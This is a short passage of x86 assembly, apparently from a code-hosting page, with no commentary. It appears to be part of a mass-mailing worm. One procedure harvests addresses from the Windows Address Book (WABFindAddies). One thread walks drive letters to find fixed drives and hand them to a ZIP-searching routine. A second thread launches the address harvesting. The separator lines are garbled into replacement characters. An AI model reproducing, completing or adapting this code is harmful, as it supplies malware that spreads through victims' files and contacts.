;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
leavewab:
invoke UnmapViewOfFile,mappedFile
invoke CloseHandle,mapHandle
invoke CloseHandle,fileHandle
ret
WABFindAddies ENDP
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; Thread procedures
thread1 proc
mov al,'c'
lea edi,fr
stosb
mov ax,'\:'
stosw
sub edi,3
isdriveok:
push edi
call GetDriveType
cmp al,03h
jnz nextdrive
mov byte ptr [edi+2],00h
jmp SearchZIP ; we dont even need a ret!
nextdrive:
cmp al,"z"
jz enddrive
inc byte ptr [edi]
jmp isdriveok
enddrive:
ret
thread1 endp
thread2 proc
pop eax ; dont need param
mov [esp],eax
call WABFindAddies
xor eax,eax
ret
thread2 endp
end start
Reference in New Issue Copy Permalink